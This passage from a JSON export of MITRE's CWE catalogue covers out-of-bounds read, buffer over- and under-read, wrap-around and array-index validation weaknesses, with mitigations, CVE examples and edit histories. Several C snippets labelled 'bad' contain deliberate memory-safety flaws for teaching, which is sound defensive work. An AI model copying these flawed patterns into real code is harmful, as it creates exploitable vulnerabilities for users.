service."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","To reduce the likelihood of introducing an out-of-bounds read, ensure that you validate and ensure correct calculations for any length argument, buffer size calculation, or offset. Be especially careful of relying on a sentinel (i.e. special character such as NUL) in untrusted inputs."]}},{"Phase":"Architecture and Design","Strategy":"Language Selection","Description":"Use a language that provides appropriate memory abstractions."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-100"},"Intro_Text":"In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int getValueFromArray(int *array, int len, int index) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int value;if (index < len) {}else {}return value;","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// check that the array index is less than the maximum","// length of the array","// if array index is invalid then output error message","// and return value indicating error"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"value = array[index];","xhtml:br":["",""],"xhtml:i":"// get the value at the specified index of the array"}},{"#text":"printf(\\"Value is: %d\\\\n\\", array[index]);value = -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"...if (index >= 0 && index < len) {...","xhtml:br":["","","","","","","",""],"xhtml:i":["// check that the array index is within the correct","// range of values for the array"]}}],"Body_Text":"However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-0160","Description":"Chain: \\"Heartbleed\\" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160"},{"Reference":"CVE-2018-10887","Description":"Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10887"},{"Reference":"CVE-2009-2523","Description":"Chain: product does not handle when an input string is not NULL terminated (CWE-170), leading to buffer over-read (CWE-125) or heap-based buffer overflow (CWE-122).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523"},{"Reference":"CVE-2018-16069","Description":"Chain: series of floating-point precision errors\\n\\t (CWE-1339) in a web browser rendering engine causes out-of-bounds read\\n\\t (CWE-125), giving access to cross-origin data","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16069"},{"Reference":"CVE-2004-0112","Description":"out-of-bounds read due to improper length check","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0112"},{"Reference":"CVE-2004-0183","Description":"packet with large number of specified elements cause out-of-bounds read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0183"},{"Reference":"CVE-2004-0221","Description":"packet with large number of specified elements cause out-of-bounds read.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0221"},{"Reference":"CVE-2004-0184","Description":"out-of-bounds read, resultant from integer underflow","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0184"},{"Reference":"CVE-2004-1940","Description":"large length value causes out-of-bounds read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1940"},{"Reference":"CVE-2004-0421","Description":"malformed image causes out-of-bounds read","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0421"},{"Reference":"CVE-2008-4113","Description":"OS kernel trusts userland-supplied length value, allowing reading of sensitive information","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Out-of-bounds Read"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR30-C","Entry_Name":"Do not form or use out-of-bounds pointers or array subscripts","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR38-C","Entry_Name":"Guarantee that library functions do not form invalid pointers","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP39-C","Entry_Name":"Do not access a variable through a pointer of an incompatible type","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR31-C","Entry_Name":"Guarantee that storage for strings has sufficient space for character data and the null terminator","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"STR32-C","Entry_Name":"Do not pass a non-null-terminated character sequence to a library function that expects a string","Mapping_Fit":"CWE More Abstract"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"540"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1034"}},{"attr":{"@_External_Reference_ID":"REF-1035"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}}]},"Notes":{"Note":{"#text":"Under-studied and under-reported. Most issues are probably labeled as buffer overflows.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Observed_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Description, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Common_Consequences, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Observed_Examples, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Relationships"}]}},"126":{"attr":{"@_ID":"126","@_Name":"Buffer Over-read","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations after the targeted buffer.","Extended_Description":"This typically occurs when the pointer or its index is incremented to a position beyond the bounds of the buffer or when pointer arithmetic results in a position outside of the valid memory location to name a few. This may result in exposure of sensitive information or possibly a crash.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"788","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Confidentiality","Impact":"Bypass Protection Mechanism","Note":"By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-91"},"Intro_Text":"In the following C/C++ example the method processMessageFromSocket() will get a message from a socket, placed into a buffer, and will parse the contents of the buffer into a structure that contains the message length and the message body. A for loop is used to copy the message body into a local character string which will be passed to another method for processing.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int processMessageFromSocket(int socket) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int success;char buffer[BUFFER_SIZE];char message[MESSAGE_SIZE];if (getMessage(socket, buffer, BUFFER_SIZE) > 0) {}return success;","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get message from socket and store into buffer","//Ignoring possibliity that buffer > BUFFER_SIZE"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"ExMessage *msg = recastBuffer(buffer);int index;for (index = 0; index < msg->msgLength; index++) {}message[index] = \'\\\\0\';success = processMessage(message);","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// place contents of the buffer into message structure","// copy message body into string for processing","// process message"],"xhtml:div":{"#text":"message[index] = msg->msgBody[index];","attr":{"@_style":"margin-left:10px;"}}}}}}}},"Body_Text":"However, the message length variable from the structure is used as the condition for ending the for loop without validating that the message length variable accurately reflects the length of the message body (CWE-606). This can result in a buffer over-read (CWE-125) by reading from memory beyond the bounds of the buffer if the message length variable indicates a length that is longer than the size of a message body (CWE-130)."},{"Intro_Text":"The following C/C++ example demonstrates a buffer over-read due to a missing NULL terminator. The main method of a pattern matching utility that looks for a specific pattern within a specific file uses the string strncopy() method to copy the command line user input file name and pattern to the Filename and Pattern character arrays respectively.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main(int argc, char **argv){}","xhtml:br":["",""],"xhtml:div":{"#text":"char Filename[256];char Pattern[32];...strncpy(Filename, argv[1], sizeof(Filename));strncpy(Pattern, argv[2], sizeof(Pattern));printf(\\"Searching file: %s for the pattern: %s\\\\n\\", Filename, Pattern);Scan_File(Filename, Pattern);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","","",""],"xhtml:i":["/* Validate number of parameters and ensure valid content */","/* copy filename parameter to variable, may cause off-by-one overflow */","/* copy pattern parameter to variable, may cause off-by-one overflow */"]}}},{"#text":"Pattern[31]=\'\\\\0\';","attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"strncpy(Filename, argv[2], sizeof(Filename)-1);Filename[255]=\'\\\\0\';strncpy(Pattern, argv[3], sizeof(Pattern)-1);","xhtml:i":["/* copy filename parameter to variable, no off-by-one overflow */","/* copy pattern parameter to variable, no off-by-one overflow */"],"xhtml:br":["","","","",""]},"xhtml:br":""}],"Body_Text":["However, the code do not take into account that strncpy() will not add a NULL terminator when the source buffer is equal in length of longer than that provide size attribute. Therefore if a user enters a filename or pattern that are the same size as (or larger than) their respective character arrays, a NULL terminator will not be added (CWE-170) which leads to the printf() read beyond the expected end of the Filename and Pattern buffers.","To fix this problem, be sure to subtract 1 from the sizeof() call to allow room for the null byte to be added."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-0160","Description":"Chain: \\"Heartbleed\\" bug receives an inconsistent length parameter (CWE-130) enabling an out-of-bounds read (CWE-126), returning memory that could include private cryptographic keys and other sensitive data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160"},{"Reference":"CVE-2009-2523","Description":"Chain: product does not handle when an input string is not NULL terminated, leading to buffer over-read or heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2523"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Buffer over-read"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1034"}},{"attr":{"@_External_Reference_ID":"REF-1035"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}}]},"Notes":{"Note":{"#text":"These problems may be resultant from missing sentinel values (CWE-463) or trusting a user-influenced input length variable.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Common_Consequences, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"}]}},"127":{"attr":{"@_ID":"127","@_Name":"Buffer Under-read","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations prior to the targeted buffer.","Extended_Description":"This typically occurs when the pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used. This may result in exposure of sensitive information or possibly a crash.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"125","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"786","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Confidentiality","Impact":"Bypass Protection Mechanism","Note":"By reading out-of-bounds memory, an attacker might be able to get secret values, such as memory addresses, which can be bypass protection mechanisms such as ASLR in order to improve the reliability and likelihood of exploiting a separate weakness to achieve code execution instead of just denial of service."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Buffer under-read"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP8","Entry_Name":"Faulty Buffer Access"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1034"}},{"attr":{"@_External_Reference_ID":"REF-1035"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}}]},"Notes":{"Note":{"#text":"Under-studied.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Common_Consequences, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"128":{"attr":{"@_ID":"128","@_Name":"Wrap-around Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Wrap around errors occur whenever a value is incremented past the maximum value for its type and therefore \\"wraps around\\" to a very small, negative, or undefined value.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"682","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"190","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}}]},"Background_Details":{"Background_Detail":"Due to how addition is performed by computers, if a primitive is incremented past the maximum value possible for its storage space, the system will not recognize this, and therefore increment each bit as if it still had extra space. Because of how negative numbers are represented in binary, primitives interpreted as signed may \\"wrap\\" to very large negative values."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":["DoS: Crash, Exit, or Restart","DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Instability"],"Note":"This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur."},{"Scope":["Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Potential_Mitigations":{"Mitigation":[{"Description":"Requirements specification: The choice could be made to use a language that is not susceptible to these issues."},{"Phase":"Architecture and Design","Description":"Provide clear upper and lower bounds on the scale of any protocols designed."},{"Phase":"Implementation","Description":"Perform validation on all incremented variables to ensure that they remain within reasonable bounds."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-33"},"Intro_Text":"The following image processing code allocates a table for images.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);...","xhtml:br":["","","","",""]}},"Body_Text":"This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119)."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Wrap-around error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM07-C","Entry_Name":"Ensure that the arguments to calloc(), when multiplied, can be represented as a size_t"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"92"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 5: Buffer Overruns." Page 89"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, "Signed Integer Boundaries", Page 220"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"The relationship between overflow and wrap-around needs to be examined more closely, since several entries (including CWE-190) are closely related.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Background_Details, Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Background_Details"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations, References"}]}},"129":{"attr":{"@_ID":"129","@_Name":"Improper Validation of Array Index","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses untrusted input when calculating or using an array index, but the product does not validate or incorrectly validates the index to ensure the index references a valid position within the array.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1285","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"119","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"823","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"789","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant","Description":"The most common condition situation leading to an out-of-bounds array index is the use of loop index variables as buffer indexes. If the end condition for the loop is subject to a flaw, the index can grow or shrink unbounded, therefore causing a buffer overflow or underflow. Another common situation leading to this condition is the use of a function\'s return value, or the resulting value of a calculation directly as an index in to a buffer."}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Often"}},{"attr":{"@_Name":"C++","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"out-of-bounds array index"},{"Term":"index-out-of-range"},{"Term":"array index underflow"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Integrity","Availability"],"Impact":"DoS: Crash, Exit, or Restart","Note":"Use of an index that is outside the bounds of an array will very likely result in the corruption of relevant memory and perhaps instructions, leading to a crash, if the values are outside of the valid memory area."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If the memory corrupted is data, rather than instructions, the system will continue to function with improper values."},{"Scope":["Confidentiality","Integrity"],"Impact":["Modify Memory","Read Memory"],"Note":"Use of an index that is outside the bounds of an array can also trigger out-of-bounds read or write operations, or operations on the wrong objects; i.e., \\"buffer overflows\\" are not always the result. This may result in the exposure or modification of sensitive data."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If the memory accessible by the attacker can be effectively controlled, it may be possible to execute arbitrary code, as with a standard buffer overflow and possibly without the use of large inputs if a precise index can be controlled."},{"Scope":["Integrity","Availability","Confidentiality"],"Impact":["DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Read Memory","Modify Memory"],"Note":"A single fault could allow either an overflow (CWE-788) or underflow (CWE-786) of the array index. What happens next will depend on the type of operation being performed out of bounds, but can expose sensitive information, cause a system crash, or possibly lead to arbitrary code execution."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis generally does not account for environmental considerations when reporting out-of-bounds memory operations. This can make it difficult for users to determine which warnings should be investigated first. For example, an analysis tool might report array index errors that originate from command line arguments in a program that is not expected to run with setuid or other special privileges."]},"Effectiveness":"High","Effectiveness_Notes":"This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Method":"Black Box","Description":"Black box methods might not get the needed code coverage within limited time constraints, and a dynamic test might not produce any noticeable side effects even if it is successful."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-7"},"Phase":"Architecture and Design","Strategy":"Input Validation","Description":"Use an input validation framework such as Struts or the OWASP ESAPI Validation API. Note 